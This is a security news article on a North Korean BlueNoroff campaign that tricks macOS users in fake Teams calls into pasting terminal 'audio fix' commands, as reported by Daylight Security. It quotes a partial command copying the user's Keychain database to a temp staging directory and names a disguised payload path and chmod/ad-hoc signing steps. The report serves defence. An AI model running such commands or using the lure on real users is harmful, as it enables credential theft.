Ddos 
A routine business call turned into a nightmare for one macOS user after North Korean state-sponsored hackers used a clever “audio issue” ruse to compromise their machine. A new investigation by Daylight Security has linked this sophisticated social engineering attack to BlueNoroff, a financially motivated subgroup of the notorious Lazarus Group.
The campaign targets professionals in the cryptocurrency and financial sectors, luring them from messaging apps into high-pressure video meetings where the “fix” for a technical glitch is actually a command to install malware.
The attack begins innocuously enough. The adversary initiates contact on platforms like Telegram, posing as a potential customer or partner. Once trust is established, they steer the victim toward a Microsoft Teams call.
It is here that the trap is sprung. During the meeting, the attacker feigns technical difficulties, claiming they cannot hear the victim.
“The attacker claimed audio issues and coached the victim into running terminal commands that downloaded and executed malicious binaries,” the report explains.
Under the guise of troubleshooting, the victim is tricked into pasting a malicious script into their terminal. This “fix” doesn’t repair the audio; instead, it downloads a payload disguised as a system cache file.
The malware is designed to blend in perfectly with the macOS environment. The victim’s host downloads an executable to a path designed to look benign: /Library/Caches/com.apple.sys.receipt.
Once downloaded, the attacker employs “living off the land” techniques—using built-in system tools—to evade detection. They immediately make the file executable and even sign it with an ad-hoc signature to bypass security checks.
“Immediately after download, the actor made the file executable (chmod 777) and used ad-hoc signing to make the file appear more ‘normal’,” Daylight Security notes.
The ultimate goal of this operation is clear: credential theft. Once established, the malware goes straight for the user’s most sensitive data repository—the Keychain.
The investigation observed the malware copying the user’s Keychain database, which stores passwords for applications, Wi-Fi networks, and even encrypted disk images.
“Credential theft was directly observed via copies of the user’s Keychain database,” the report states, citing the command: cp -rf…/login.keychain-db/tmp/<staging_dir>.
Additionally, the malware targeted “secondary components,” executing a hidden file disguised within a temporary iCloud sync application path to ensure persistence.
This “GhostCall” tactic is a hallmark of BlueNoroff, a group infamous for its revenue-generating operations targeting Web3 and financial organizations. By moving victims from text chats to live video calls, they increase the psychological pressure and lower the victim’s guard.
“From a threat intelligence perspective, this activity is consistent with the GhostCall campaign pattern publicly attributed to BlueNoroff,” Daylight Security concludes.
Donate